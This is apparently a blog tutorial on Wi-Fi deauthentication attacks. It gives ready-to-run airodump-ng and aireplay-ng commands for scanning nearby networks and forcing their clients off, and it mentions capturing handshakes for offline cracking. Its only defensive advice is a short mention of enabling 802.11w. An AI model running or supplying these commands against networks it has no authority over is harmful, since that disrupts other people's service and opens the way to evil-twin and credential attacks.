Disconnecting wireless clients from access points

The problem

The nature of wireless networking is quite problematic because transmission goes over air and can be intercepted by anyone. Of course there is data packet stream encryption. But deauthentication frames are not encrypted and can be forged. It’s applicable to IEEE 802.11 standard. However if your device is capable of 802.11w standard amendment then the management frames are protected from forging, however in various devices this option is disabled by default even if they support it. In case of your device check manual for default settings. It’s worth enabling this option. Not enabling, and securing both stations and base stations can lead not only to service denial/disruption, but also opens way to few possible attacks like “evil-twin“.

How to

To identify network or device to disrupt you can use airodump-ng. It turns your network adapter into listening mode and scans nearby networks. To switch between stations or base stations mode press “a”. For realtime sorting press “r”. Last must know shortcut is “s” for sorting. Space bar pauses scanning.

ip addr # to look for yournetadapter
sudo airodump-ng yournetadapter -w capturefilename

Base stations, which are access points are identified by column BSSID. Stations, which are clients, shows in the second table below. You can choose to deauthenticate just with MAC address of an access point or ESSID, which is human readible name. You can also pick some stations from the the second table to direct a deauthentication attack more precisely.

For a deauthentication part of the procedure use aireplay-ng tool. Pass –deauth with number of frames to send. If targeting only access points then pass -a with MAC of BSSID. If you target also some stations, then pass -c with MAC of a station (client).

sudo aireplay-ng --deauth 100 -a BSSIDMAC -c STATIONMAC yournetadapter

With proper values passed, stations will be disconnected from access point so their wireless service will be disrupted. As mentioned before it applies only to devices without IEEE 802.11w extension, which is most of consumer network devices. For enterprises it is highly possible that they will have proper enhancements already enabled.

Afterword

With airodump-ng you can select particular wireless channel to scan. You can also identify networks without security enabled at all. With traffic capturing feature enabled you can intercept precious parts of authentication procedure so you could try to crack it offline.

As an optional tool for any wireless related activities I can recommend WIFiman for Android which does the job of network perimeter exploration.